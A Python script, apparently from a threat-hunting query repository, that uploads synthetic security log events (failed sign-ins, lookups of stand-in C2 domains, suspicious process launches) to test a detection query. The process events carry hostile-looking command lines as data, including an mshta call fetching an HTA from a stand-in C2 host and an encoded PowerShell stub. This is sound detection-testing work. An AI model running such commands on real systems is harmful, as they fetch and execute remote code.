mirror of
https://github.com/marcredhat/kql
synced 2026-06-08 13:23:58 +00:00
142 lines
4.8 KiB
Python
142 lines
4.8 KiB
Python
#!/usr/bin/env python3
|
|
"""Seed synthetic OCSF-shaped events for docs/runnable_examples/*.pq.
|
|
|
|
The 90-day Okta+DNS+Process hunt joins three event families on
|
|
(userName, host). To make the query return at least one row at
|
|
startTime="2h", we ingest a small batch of events for two
|
|
user/host pairs that satisfy all three legs of the join inside
|
|
the last 2h window.
|
|
|
|
Events use SDL dotted-key JSON (the SDL `json` parser indexes
|
|
nested fields so queries can reference `event.login.userName`,
|
|
`dns.question.name`, `src.process.cmdline`, etc., as written
|
|
in the example PQ).
|
|
"""
|
|
from __future__ import annotations
|
|
|
|
import json
|
|
import sys
|
|
import time
|
|
import uuid
|
|
from datetime import datetime, timedelta, timezone
|
|
from pathlib import Path
|
|
|
|
ROOT = Path(__file__).resolve().parents[1]
|
|
sys.path.insert(0, str(ROOT))
|
|
from harness.sdl_client import upload_logs, power_query # noqa: E402
|
|
|
|
|
|
NOW = datetime.now(timezone.utc).replace(microsecond=0)
|
|
|
|
|
|
def iso(dt: datetime) -> str:
|
|
return dt.strftime("%Y-%m-%dT%H:%M:%S.000Z")
|
|
|
|
|
|
def in_recent(seconds_ago: int) -> datetime:
|
|
return NOW - timedelta(seconds=seconds_ago)
|
|
|
|
|
|
PAIRS = [
|
|
("alice@contoso.com", "host-alpha"),
|
|
("bob@contoso.com", "host-bravo"),
|
|
]
|
|
BAD_DOMAINS = ["c2.example.com", "suspect.example.net"]
|
|
LOLBINS = [
|
|
"powershell -enc JABm...",
|
|
"rundll32.exe shell32,Control_RunDLL",
|
|
"mshta.exe http://c2.example.com/p.hta",
|
|
]
|
|
|
|
|
|
def build_events(run_id: str) -> list[dict]:
|
|
"""Emit OCSF-flavored events as FLAT JSON whose keys contain literal
|
|
dots (e.g. `"event.category"` rather than nested `{"event":{...}}`).
|
|
|
|
SDL's uploadLogs+parser=json indexes each top-level JSON key as a
|
|
column, and dotted names index as dotted columns -- so the published
|
|
runnable example can reference `event.category`, `endpoint.name`,
|
|
`dns.question.name`, `src.process.cmdline`, etc. exactly as it would
|
|
on a real OCSF-mapped tenant (proven by harness/probe_dotted_keys.py).
|
|
|
|
Booleans serialize to lowercase strings via _clean_attrs upstream, so
|
|
the example filters with `event.login.loginIsSuccessful = 'false'`.
|
|
"""
|
|
out: list[dict] = []
|
|
t = 60
|
|
for user, host in PAIRS:
|
|
# ---- failed signins (event.category='logins')
|
|
for i in range(3):
|
|
ts = in_recent(t); t += 30
|
|
out.append({
|
|
"TimeGenerated": iso(ts),
|
|
"ts_epoch_ms": int(ts.timestamp() * 1000),
|
|
"proof_run_id": run_id,
|
|
"event.category": "logins",
|
|
"event.login.userName": user,
|
|
"event.login.loginIsSuccessful": "false",
|
|
"endpoint.name": host,
|
|
})
|
|
# ---- bad DNS (event.type='DNS Resolved')
|
|
for d in BAD_DOMAINS:
|
|
ts = in_recent(t); t += 30
|
|
out.append({
|
|
"TimeGenerated": iso(ts),
|
|
"ts_epoch_ms": int(ts.timestamp() * 1000),
|
|
"proof_run_id": run_id,
|
|
"event.type": "DNS Resolved",
|
|
"dns.question.name": d,
|
|
"endpoint.name": host,
|
|
"src.endpoint.user.name": user,
|
|
})
|
|
# ---- suspicious process (event.type='Process Creation')
|
|
for cmd in LOLBINS:
|
|
ts = in_recent(t); t += 30
|
|
out.append({
|
|
"TimeGenerated": iso(ts),
|
|
"ts_epoch_ms": int(ts.timestamp() * 1000),
|
|
"proof_run_id": run_id,
|
|
"event.type": "Process Creation",
|
|
"endpoint.name": host,
|
|
"src.process.cmdline": cmd,
|
|
"src.process.user": user,
|
|
})
|
|
return out
|
|
|
|
|
|
def main() -> int:
|
|
run_id = f"run-runnable-{uuid.uuid4().hex[:10]}"
|
|
events = build_events(run_id)
|
|
body = "\n".join(json.dumps(e, default=str) for e in events)
|
|
print(f"[seed_runnable_examples] events = {len(events)}")
|
|
print(f"[seed_runnable_examples] run_id = {run_id}")
|
|
print(f"[seed_runnable_examples] anchor = {NOW.isoformat()}")
|
|
|
|
r = upload_logs(body, server_host="kql-proof",
|
|
logfile="runnable-examples.jsonl", parser="json")
|
|
if r.get("status") != "success":
|
|
print(f"uploadLogs rejected: {r}")
|
|
return 1
|
|
|
|
# Poll until indexed (use proof_run_id which is unique per run).
|
|
print("Waiting for indexing", end="", flush=True)
|
|
for _ in range(30):
|
|
time.sleep(2)
|
|
resp = power_query(f"proof_run_id='{run_id}' | group n=count()", "30m")
|
|
vals = resp.get("values") or []
|
|
n = int(vals[0][0]) if vals and vals[0] and vals[0][0] is not None else 0
|
|
print(f" {n}", end="", flush=True)
|
|
if n >= len(events):
|
|
print(" ✓ ready"); break
|
|
else:
|
|
print(" (timeout, continuing)")
|
|
|
|
out = ROOT / "sample_data" / "runnable_examples_run_id.txt"
|
|
out.write_text(run_id)
|
|
print(f"Wrote {out}")
|
|
return 0
|
|
|
|
|
|
if __name__ == "__main__":
|
|
sys.exit(main())
|